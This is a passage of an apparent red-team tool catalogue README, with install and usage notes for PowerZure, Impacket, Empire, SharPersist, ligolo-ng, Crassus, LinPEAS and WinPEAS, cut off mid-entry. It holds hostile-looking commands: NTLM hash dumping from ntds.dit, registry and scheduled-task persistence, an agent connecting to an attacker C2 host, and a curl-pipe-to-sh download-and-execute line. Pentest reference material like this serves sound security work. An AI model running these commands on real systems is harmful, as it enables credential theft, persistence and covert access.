zero reason to ever run PowerZure on a victim’s machine. 
Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your operating machine.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1"><pre>Install-Module -Name Az git clone https://github.com/hausec/PowerZure <span class="pl-c1">cd</span> PowerZure ipmo C:<span class="pl-cce">\p</span>ath<span class="pl-cce">\t</span>o<span class="pl-cce">\P</span>owerZure.psd1</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Get a list of AzureAD and Azure objects you have access to Get-AzureTarget"><pre><span class="pl-c"><span class="pl-c">#</span> Get a list of AzureAD and Azure objects you have access to</span> Get-AzureTarget</pre></div> <p dir="auto"><a href="https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a" rel="nofollow">Blog - Attacking Azure, Azure AD, and Introducing PowerZure</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png"><img src="https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://hakin9.org" rel="nofollow">https://hakin9.org</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Persistence</h1><a id="user-content-persistence" class="anchor" 
aria-label="Permalink: Persistence" href="#persistence"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/fortra/impacket">Impacket</a></h3><a id="user-content-impacket" class="anchor" aria-label="Permalink: 🔙Impacket" href="#impacket"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.</p> <p dir="auto">It also includes a 
number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 -m pip install impacket"><pre>python3 -m pip install impacket</pre></div> <p dir="auto"><strong>Install: (With Example Scripts)</strong></p> <p dir="auto">Download and extract <a href="https://github.com/fortra/impacket">the package</a>, then navigate to the install folder and run...</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 -m pip install ."><pre>python3 -m pip install <span class="pl-c1">.</span></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # Gets a list of the sessions opened at the remote hosts netview.py domain/user:password -target 192.168.10.2 # Retrieves the MSSQL instances names from the target host. mssqlinstance.py 192.168.1.2 # This script will gather data about the domain's users and their corresponding email addresses. 
GetADUsers.py domain/user:password@IP"><pre><span class="pl-c"><span class="pl-c">#</span> Extract NTLM hashes with local files</span> secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL <span class="pl-c"><span class="pl-c">#</span> Gets a list of the sessions opened at the remote hosts</span> netview.py domain/user:password -target 192.168.10.2 <span class="pl-c"><span class="pl-c">#</span> Retrieves the MSSQL instances names from the target host.</span> mssqlinstance.py 192.168.1.2 <span class="pl-c"><span class="pl-c">#</span> This script will gather data about the domain's users and their corresponding email addresses.</span> GetADUsers.py domain/user:password@IP</pre></div> <p dir="auto">Great <a href="https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/" rel="nofollow">cheat sheet</a> for Impacket usage.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png"><img src="https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/EmpireProject/Empire">Empire</a></h3><a id="user-content-empire" class="anchor" aria-label="Permalink: 🔙Empire" href="#empire"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.</p> <p dir="auto">Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.</p> <p dir="auto">Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/EmpireProject/Empire cd Empire sudo ./setup/install.sh"><pre>git clone https://github.com/EmpireProject/Empire <span class="pl-c1">cd</span> Empire sudo ./setup/install.sh</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Start Empire ./empire # List live agents list agents # List live listeners list listeners"><pre><span class="pl-c"><span class="pl-c">#</span> Start Empire</span> ./empire <span class="pl-c"><span class="pl-c">#</span> List live agents</span> list agents <span class="pl-c"><span class="pl-c">#</span> List live listeners</span> list listeners</pre></div> <p dir="auto">Nice usage <a href="https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf">cheat sheet</a> by <a href="https://github.com/HarmJ0y">HarmJoy</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" 
href="https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png"><img src="https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mandiant/SharPersist">SharPersist</a></h3><a id="user-content-sharpersist" class="anchor" aria-label="Permalink: 🔙SharPersist" href="#sharpersist"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A Windows persistence toolkit written in C#.</p> <p dir="auto">The project has a <a href="https://github.com/mandiant/SharPersist/wiki">wiki</a>.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">You can find the most recent release <a href="https://github.com/mandiant/SharPersist/releases">here</a>.</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <ul dir="auto"> <li>Download the project files from the <a href="https://github.com/mandiant/SharPersist">GitHub Repo</a>.</li> <li>Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"</li> <li>Go to "NuGet Package Manager" --> "Package Sources"</li> <li>Add a package source with the URL "<a 
href="https://api.nuget.org/v3/index.json" rel="nofollow">https://api.nuget.org/v3/index.json</a>"</li> <li>Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019. <ul dir="auto"> <li><code>Install-Package Costura.Fody -Version 3.3.3</code></li> </ul> </li> <li>Install the TaskScheduler package <ul dir="auto"> <li><code>Install-Package TaskScheduler -Version 2.8.11</code></li> </ul> </li> <li>You can now build the project yourself!</li> </ul> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">A full list of usage examples can be found <a href="https://github.com/mandiant/SharPersist#adding-persistence-triggers-add">here</a>.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="#KeePass SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add #Registry SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add"><pre class="notranslate"><code>#KeePass SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add #Registry SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer 
nofollow" href="https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png"><img src="https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/nicocha30/ligolo-ng">ligolo-ng</a></h3><a id="user-content-ligolo-ng" class="anchor" aria-label="Permalink: 🔙ligolo-ng" href="#ligolo-ng"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).</p> <p dir="auto">Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using <a href="https://gvisor.dev/" rel="nofollow">Gvisor</a>.</p> <p dir="auto">When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.</p> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">Precompiled binaries (Windows/Linux/macOS) are available on the <a href="https://github.com/nicocha30/ligolo-ng/releases">Release page</a>.</p> <p 
dir="auto"><strong>Install: (Build)</strong></p> <p dir="auto"><em>Building ligolo-ng (Go >= 1.17 is required):</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go # Build for Windows GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go"><pre>go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go <span class="pl-c"><span class="pl-c">#</span> Build for Windows</span> GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go</pre></div> <p dir="auto"><strong>Setup: (Linux)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up"><pre>sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link <span class="pl-c1">set</span> ligolo up</pre></div> <p dir="auto"><strong>Setup: (Windows)</strong></p> <p dir="auto">You need to download the <a href="https://www.wintun.net/" rel="nofollow">Wintun</a> driver (used by <a href="https://www.wireguard.com/" rel="nofollow">WireGuard</a>) and place the <code>wintun.dll</code> in the same folder as Ligolo (make sure you use the right architecture).</p> <p dir="auto"><strong>Setup: (Proxy server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates"><pre>./proxy -h <span class="pl-c"><span class="pl-c">#</span> Help options</span> ./proxy -autocert <span class="pl-c"><span class="pl-c">#</span> Automatically request LetsEncrypt certificates</span></pre></div> <p 
dir="auto"><strong>Usage:</strong></p> <p dir="auto"><em>Start the agent on your target (victim) computer (no privileges are required!):</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./agent -connect attacker_c2_server.com:11601"><pre>./agent -connect attacker_c2_server.com:11601</pre></div> <p dir="auto">A session should appear on the proxy server.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000""><pre class="notranslate"><code>INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" </code></pre></div> <p dir="auto">Use the session command to select the agent.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="ligolo-ng » session ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000"><pre class="notranslate"><code>ligolo-ng » session ? 
Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000 </code></pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/nicocha30/ligolo-ng#using-ligolo-ng">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png"><img src="https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/nicocha30/ligolo-ng#demo">https://github.com/nicocha30/ligolo-ng#demo</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Privilege Escalation</h1><a id="user-content-privilege-escalation" class="anchor" aria-label="Permalink: Privilege Escalation" href="#privilege-escalation"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/vu-ls/Crassus">Crassus</a></h3><a id="user-content-crassus" class="anchor" aria-label="Permalink: 🔙Crassus" href="#crassus"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" 
aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">"Accenture made a tool called Spartacus, which finds DLL hijacking opportunities on Windows. Using Spartacus as a starting point, we created Crassus to extend Windows privilege escalation finding capabilities beyond simply looking for missing files. The ACLs used by files and directories of privileged processes can find more than just looking for missing files to achieve the goal." - <a href="https://github.com/vu-ls/Crassus?tab=readme-ov-file#why-crassus">Link</a></p> <p dir="auto"><strong>Install: (Build)</strong></p> <p dir="auto">Crassus was developed as a Visual Studio 2019 project. 
To build Crassus.exe:</p> <ol dir="auto"> <li>Open Crassus.sln</li> <li>Press Ctrl+Shift+B on your keyboard</li> </ol> <p dir="auto"><strong>Install: (precompiled)</strong></p> <p dir="auto">If you trust running other people's code without knowing what it does, Crassus.exe is <a href="https://github.com/vu-ls/Crassus/blob/main/binaries/Crassus.exe">provided in this repository</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <ol dir="auto"> <li>In <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon" rel="nofollow">Process Monitor</a>, select the <code>Enable Boot Logging</code> option.</li> <li>Reboot.</li> <li>Once you have logged in and Windows has settled, optionally also run <a href="https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c">scheduled tasks that may be configured to run with privileges</a>.</li> <li>Run Process Monitor once again.</li> <li>When prompted, save the boot log.</li> <li>Reset the default Process Monitor filter using <code>Ctrl-R</code>.</li> <li>Save this log file, e.g., to <code>boot.PML</code>. 
The reason for re-saving the log file is twofold: <ol dir="auto"> <li>Older versions of Process Monitor do not save boot logs as a single file.</li> <li>Boot logs by default will be unfiltered, which may contain extra noise, such as a local-user DLL hijacking in the launching of of Process Monitor itself.</li> </ol> </li> </ol> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14"><img src="https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14" alt="Crassus" 
style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots">https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS">LinPEAS</a></h3><a id="user-content-linpeas" class="anchor" aria-label="Permalink: 🔙LinPEAS" href="#linpeas"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">LinPEAS is a verbose privilege-escalation enumeration script for finding local privesc routes on Linux endpoints.</p> <p dir="auto">Note that the one-liner below downloads whatever the <code>latest</code> release happens to be and pipes it straight into <code>sh</code>. On a real engagement, prefer saving the script to disk first, pinning a specific release, and reviewing or hashing it before you run it.</p> <p dir="auto"><strong>Install + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh"><pre>curl -L <span class="pl-s"><span class="pl-pds">"</span>https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh<span class="pl-pds">"</span></span> <span class="pl-k">|</span> sh</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png"><img 
src="https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS">WinPEAS</a></h3><a id="user-content-winpeas" class="anchor" aria-label="Permalink: 🔙WinPEAS" href="#winpeas"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">WinPEAS is a verbose privilege-escalation enumeration tool for finding local privesc routes on Windows endpoints.</p> <p dir="auto">The one-liner below downloads the <code>latest</code> <code>winPEASany_ofs.exe</code> release and loads it directly into the current PowerShell process with <code>Assembly.Load</code> instead of writing it to disk. As with any download-and-execute one-liner, prefer a specific release you have verified over <code>latest</code>.</p> <p dir="auto"><strong>Install + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" 